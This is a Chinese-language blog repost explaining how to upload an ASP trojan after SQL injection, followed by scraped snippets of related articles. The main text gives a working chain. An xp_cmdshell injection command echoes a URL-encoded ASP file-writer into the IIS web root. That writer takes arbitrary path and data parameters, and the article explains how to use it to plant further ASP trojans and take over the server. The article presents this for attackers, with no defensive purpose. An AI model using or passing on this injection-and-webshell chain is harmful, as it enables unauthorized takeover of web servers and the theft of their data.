SQL注入與ASP木馬上傳

2021-08-21 23:28:37 字數 1836 閱讀 6619

sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。

1、sql注入的時候,用xp_cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。

檔案內容:

<%

set objfso = server.createobject("scripting.filesystemobject")

set objcountfile=objfso.createtextfile(request("mypath"),true)

objcountfile.write request("mydata")

objcountfile.close

%>

這個檔案可以寫成一行 <%set objfso = server.createobject("scripting.filesystemobject"):set objcountfile=objfso.createtextfile(request("mypath"),true):objcountfile.write request("mydata"):objcountfile.close%>

將特殊字元進行編碼 就可以得到

%3c%25set%20objfso%20=%20server.createobject(%22scripting.filesystemobject%22):set%20objcountfile=objfso.createtextfile(request(%22mypath%22),true):objcountfile.write%20request(%22mydata%22):objcountfile.close%25%3e

注入(這裡假定web目錄是c:\inetpub\wwwroot\):

exec master..xp_cmdshell 'echo "%3c%25set%20objfso%20=%20server.createobject(%22scripting.filesystemobject%22):set%20objcountfile=objfso.createtextfile(request(%22mypath%22),true):objcountfile.write%20request(%22mydata%22):objcountfile.close%25%3e" > c:\inetpub\wwwroot\ftp.asp';

這樣 在伺服器的web 目錄下 將生成乙個 ftp.asp檔案

該檔案的**為

<%

set objfso = server.createobject("scripting.filesystemobject")

set objcountfile=objfso.createtextfile(request("mypath"),true)

objcountfile.write request("mydata")

objcountfile.close

%>

你可以看到,上面**中預留了兩個介面 mypath 和 mydata

mypath是下次提交的時候 檔案的生成路徑

mydata是檔案的內容

在本地編寫乙個客戶端檔案 例:rohuclient.htm **如下

在目標位置欄填上剛剛生成的ftp.asp檔案的url位址

如 (這裡假設伺服器的ip是 127.0.0.1)

在生成檔案欄 輸入將在伺服器上生成的檔名 比如:c:\inetpub\wwwroot\server.asp

在檔案內容裡 ,隨意的貼上乙個asp**

點遞交,當

檔案執行完畢 基本上伺服器上的asp木馬就生成了。

瀏覽 呵呵 伺服器就是你的了

hoky: 這篇文章前段時間不知道在那個地方看過.轉貼的時候就沒有寫作者是誰.我也不記得了.

SQL注入與ASP木馬上傳

sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。1 sql注入的時候,用xp cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。檔案內容 set objfso server.createobject scripting.filesystemobject s...

SQL注入木馬

sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。1 sql注入的時候,用xp cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。檔案內容 set objfso server.createobject scripting.filesystemobject s...

有效防止ASP木馬上傳執行 小知識 網路安全技術

一般現今asp木馬常通過以下四點來操作伺服器,所以我們只要將一下四處設定好就能從一 前使用iis伺服器的站長很多,特別是對於asp 來說,防止www.cppcns.comasp木馬成了 安全最關鍵的內容。一般現今asp木馬常通過以下四點來操作伺服器,所以我們只要將一下四處設定好就能從一定程度上有效防...